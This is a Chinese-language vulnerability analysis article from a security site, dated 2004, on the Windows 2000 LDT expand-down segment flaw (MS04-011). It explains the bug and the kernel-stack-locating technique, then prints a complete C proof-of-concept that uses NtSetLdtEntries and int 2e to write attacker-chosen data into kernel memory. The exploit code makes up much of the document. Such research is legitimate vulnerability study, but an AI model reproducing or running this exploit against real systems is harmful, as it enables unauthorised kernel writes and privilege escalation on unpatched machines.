首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞检测>文章内容
Win2k LDT漏洞初探
来源:www.safechina.net 作者:mslug 发布时间:2004-04-21  

Win2k LDT漏洞初探

作者: mslug (a147654_at_hotmail.com)
主页: www.safechina.net

因为本人水平有限,错误的地方还请指正.

1.漏洞原因

z0mbie文章里提到在Win2k下进程可以自己添加LDT项,这可能是由于历史原因才留在系统代码中,
因为Win2k本身并不会用到LDT.这个漏洞的核心是LDT项中Expand-Down位的设置.例子,一个LDT
的Base为100,Limit为7FFFFFFF.当Expand-Down位为0时.LDT的有效范围是: 100 ~ 7FFFFFFF.
但当Expand-Down位为1时,有效范围是: 80000000 ~ FFFFFFFF 和 0 ~ FF,及刚好相反.在Win2k
添加LDT项的检测过程没有考虑这一情况,导致用户可以建立包含内核空间在内的LDT项(这其实
只是一方面,GDT[23]本来就是0-FFFFFFFF,关键是我们可以控制LDT的基址,而内核有时假设基址
为0,这样能使其在处理内存时发生计算误差).

2.利用原理

因为Win2k是基于页的内存保护机制,而我们又运行在ring3态下这一事实,所以需要借助内核本身
来进行越权操作.eEye的文中提到int 2e中的rep movsd指令.int 2e的使用方法:

mov eax, service_id
lea edx, service_param
int 2e

当运行rep movsd指令时:

edi为内核堆栈指针(KSP, 我机子上一般是FDxxxxxx)
esi指向service_param
ecx为参数的个数(in 32bit)

相当于memcpy (es.base+edi, ds.base+esi, ecx*4);

这里service_param的内容,es寄存器都是可控的.唯一不确定的是edi及内核堆栈指针.获得KSP一
种方法是,先假设一个大约值,比如FD000000,再分配一较大内存空间(16MB)buf,利用这个漏洞将
一特征码写入buf,最后找出特征码在buf中的偏移量offset,计算出:

KSP精确值 = 假设值(FD000000) + offset.

至于提升权限的部分,还没找到比较通用的方法.eEye说加LDT,但LDT的地址在KSP下方,没理解.
IDT, GDT也在KSP下方.我能想到就是改Driver Dispatch Routies,通过I/O API调用.因为不是
很通用这里就不列了.如果有什么好的方法,请告诉我.谢谢.

3.具体步骤

见代码.另外Win2k的代码也有了,可以和eEye的公告对照着看.


/***********************************************************
* 计算出Kernel Stack Pointer后,就能精确控制写入的地址了.
* 要注意的是只能覆写到KSP以上的内核空间.
***********************************************************/

/******************************************************************
* Windows Expand-Down Data Segment Local Privilege Escalation
* [MS04-011]
*
* Bug found by: Derek Soeder
* Author: mslug (a1476854@hotmail.com), All rights reserved.
*
* Version: PoC 0.1
*
* Tested: Win2k pro en sp4
*
* Thanks: z0mbie's article :)
*
* Compile: cl winldt.c
*
* Date: 18 Apr 2004
*******************************************************************/


#include <windows.h>
#include <stdio.h>
#include <string.h>

#if 1
#define KernelStackPtr 0xFD000000 //估计值
#define BedSize 0x01000000
#else
#define KernelStackPtr 0xF0000000
#define BedSize 0x10000000
#endif

unsigned char bed[BedSize];
unsigned char pin[]="COOL";

int (*NtSetLdtEntries)(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD);

WORD SetupLDT(WORD seg, DWORD ldtbase);

unsigned long patch_to;

int main(int argc, char *argv[])
{
DWORD ldtbase, KSP;
int i;
HMODULE hNtdll;

if(argc<2) {
printf("** coded by mslug@safechina.net **\n");
printf("winldt.exe <kernel address>\n");
return 0;
}

patch_to = strtoul(argv[1], 0, 16);

hNtdll = LoadLibrary("ntdll.dll");

(DWORD*)NtSetLdtEntries = (DWORD*)GetProcAddress(hNtdll, "NtSetLdtEntries");

memset(bed, 'A', BedSize);
bed[BedSize-1]=0;

ldtbase = (DWORD) &bed[0] - KernelStackPtr;

printf("[+] User-land bed : 0x%08X\n", &bed[0]);
printf("[+] 1st LDT base : 0x%08X\n", ldtbase);

SetupLDT(0x1f, ldtbase);
__asm {
push es
push 1fh
pop es
mov eax, 11h //1 param
lea edx, pin
int 2eh
pop es
}

for (KSP=0, i=0; i<BedSize-3; i++) {
if (bed[i] =='C' && bed[i+1]=='O' &&
bed[i+2]=='O' && bed[i+3]=='L' )
{
KSP = KernelStackPtr + i;
printf("[!] Knl stack ptr : 0x%08X\n", KSP);
//KSP = (DWORD)&bed[i]-ldtbase;
//printf("[!] Knl stack ptr : 0x%08X\n", KSP);
break;
}
}

if(!KSP) {
printf("[-] Can't locate Kernel stack pointer, try again\n");
return 0;
} else if (patch_to < KSP) {
printf("[-] Can only patch kernel above KSP\n");
return 0;
}

ldtbase = patch_to - KSP;

printf("[+] Patch to : 0x%08X\n", patch_to);
printf("[+] 2nd LDT base : 0x%08X\n", ldtbase);

SetupLDT(0x17, ldtbase);
__asm {
push es
push 17h
pop es
mov eax, 11h
lea edx, pin
int 2eh
pop es
}

return 0;
}

WORD SetupLDT(WORD seg, DWORD ldtbase)
{
LDT_ENTRY EvilLdt;
DWORD base = ldtbase;
DWORD limit = 0;
int ret;

EvilLdt.BaseLow = base & 0xFFFF;
EvilLdt.HighWord.Bytes.BaseMid = base >> 16;
EvilLdt.HighWord.Bytes.BaseHi = base >> 24;
EvilLdt.LimitLow = (limit >> 12) & 0xFFFF;
EvilLdt.HighWord.Bits.LimitHi = limit >> 28;
EvilLdt.HighWord.Bits.Granularity = 1; // 0/1, if 1, limit=(limit<<12)|FFF
EvilLdt.HighWord.Bits.Default_Big = 1; // 0=16bit 1=32bit
EvilLdt.HighWord.Bits.Reserved_0 = 0; // 0/1
EvilLdt.HighWord.Bits.Sys = 0; // 0/1
EvilLdt.HighWord.Bits.Pres = 1; // 0/1 (presence bit)
EvilLdt.HighWord.Bits.Dpl = 3; // only 3 allowed :-(
EvilLdt.HighWord.Bits.Type = 23; // [16..27]

ret = NtSetLdtEntries( seg,
*(DWORD*)&EvilLdt,
*(((DWORD*)&EvilLdt)+1),
0,0,0);
if (ret < 0) {
printf("[-] Set ldt error : %08X.\n", ret);
exit(0);
}

return seg;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·MS07-014调试手记
·udp_sendmsg空指针漏洞分析
·一段对perl 木马的分析
·小心我“DIR”溢出你!
·CVE-2010-4258漏洞分析
·Adobe Reader 'CoolType.dll' TT
·PHPBB<+2.0.10 漏洞说明
·袁哥写的漏洞研究方法总结
·利用异常处理执行shellcode实例
·注入点检测新方法
·Apache mod_ssl buffer over分析
·RPC漏洞的通用分析方法
  相关文章
·分析ms locator vul
·Acrobat Reader5.1漏洞分析
·windows溢出随笔
·分析server-u site chmod 漏洞
·AIX捉虫记之invscoutd
·Serv-U MDTM命令远程溢出分析
·袁哥写的漏洞研究方法总结
·Apache mod_ssl buffer over分析
·高级WIN2K ROOTKIT检测技术
·雪人论坛的Sql Injection的漏洞
·Microsoft WordPerfect转换器远
·Ofstar和phpind论坛安全性分析
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved